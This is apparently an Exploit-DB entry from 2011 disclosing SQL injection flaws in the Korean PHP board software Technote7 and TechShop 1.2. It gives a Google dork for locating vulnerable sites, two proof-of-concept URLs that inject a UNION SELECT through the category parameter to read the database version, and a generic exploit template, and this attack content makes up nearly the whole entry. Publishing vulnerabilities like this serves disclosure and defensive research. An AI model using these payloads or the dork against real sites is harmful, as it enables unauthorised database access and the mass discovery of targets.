Tech Shop Technote 7 - SQL Injection

EDB-ID:

15890

CVE:

N/A


Author:

MaJ3stY

Type:

webapps


Platform:

PHP

Date:

2011-01-01


# Exploit Title: Technote7(Commercial Version, Free Version) <== SQL Injection  Vulnerabilities
# Google Dork: inurl:/technote/board.php?category=
# Date: 2011/01/02
# Author: MaJ3stY(http://maj3sty.tistory.com)
# Language : PHP 
# Software Link: http://www.technote.co.kr/php/technote1/board.php?board=consult&command=skin_insert&exe=insert_down_shop
# Version: Technote7, TechShop 1.2(The latest version of the current from)
# Tested on: All Windows, All Linux

PoC(Technote7) :
 
 http://localhost/board.php?board=skinmarket&category=11 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61--

PoC(Technote7 - Techshop 1.2) :

 http://localhost/board.php?board=agcmain&category=10 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--

Exploit :

http://site/board.php?board=boarname&category=[SQL Line]